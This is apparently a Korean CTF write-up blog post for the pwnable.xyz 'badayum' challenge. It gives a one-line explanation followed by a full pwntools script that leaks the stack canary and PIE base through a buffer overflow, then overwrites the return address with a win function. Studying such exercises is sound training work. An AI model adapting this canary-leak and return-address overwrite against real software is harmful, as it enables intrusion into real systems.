일정 확률로 bof가 터진다 canary랑 pie 릭한 담에 ret주소 win으로 덮으면 된다
from pwn import *
context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30027)
#p = process("./badayum")
win = 0xd34
def send(data):
p.recvuntil(b"you > ")
p.send(data)
def extract_len():
p.recvuntil(b"me > ")
data = p.recvline()
return len(data)
def find_len(num):
while True:
length = extract_len()
if length >= num:
return 0
else:
send(b"A")
find_len(0x69)
payload = b"A" * 0x68
payload += b"B" * 1
send(payload)
p.recvuntil(b"B")
cnry = b"\x00"
cnry += p.recv(7)
canary = u64(cnry)
find_len(0x78)
payload = b"A" * 0x77
payload += b"B"
send(payload)
p.recvuntil(b"B")
leak = p.recv(6)
leak += b"\x00\x00"
pie = u64(leak) - 0x1081
win = pie + win
log.info("canary: " + hex(canary))
log.info("pie: " + hex(pie))
log.info("win: " + hex(win))
find_len(0x80)
payload = b"A" * 0x68
payload += p64(canary)
payload += b"A" * 8
payload += p64(win)
send(payload)
send(b"exit")
p.interactive()'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / note v2 (0) | 2022.05.24 |
|---|---|
| pwnable.xyz / executioner v2 (0) | 2022.05.23 |
| pwnable.xyz / password (0) | 2022.05.23 |
| pwnable.xyz / executioner (0) | 2022.05.22 |
| pwnable.xyz / Punch it (0) | 2022.05.22 |
